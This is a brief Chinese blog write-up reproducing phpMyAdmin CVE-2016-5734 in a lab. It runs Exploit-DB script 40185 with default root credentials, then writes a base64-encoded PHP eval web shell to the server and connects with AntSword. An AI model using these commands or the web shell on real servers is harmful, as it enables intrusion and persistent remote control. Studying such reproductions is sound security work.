phpmyadin CVE-2016-5734漏洞复现

. iDea.

于 2021-04-09 07:27:25 发布

阅读量247

点赞数

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签： mysql

本文链接：https://blog.csdn.net/qq_46804551/article/details/115535774

漏洞复现专栏收录该内容

18 篇文章

订阅专栏

本文介绍了通过利用脚本进行CVE-2016-57漏洞的复现过程，包括下载并使用脚本对目标服务器发起攻击，最终实现远程代码执行及木马文件的写入。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

搭建

在这里插入图片描述

漏洞复现

下载利用脚本：
https://www.exploit-db.com/exploits/40185
脚本利用方法：

-u 账号
-p 密码
-c 执行代码(php代码) 默认执行uname -a

python 40185.py -u root -p root http://192.168.154.3:8080

在这里插入图片描述
成功读取到文件
接下来写入木马

 python .\CVE-2016-57.py -u root --pwd="root" http://192.168.1.101:8080 -c "file_put_contents('whh.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1Rbcm9vdF0pOz8+'));"

在这里插入图片描述

上蚁剑

连接成功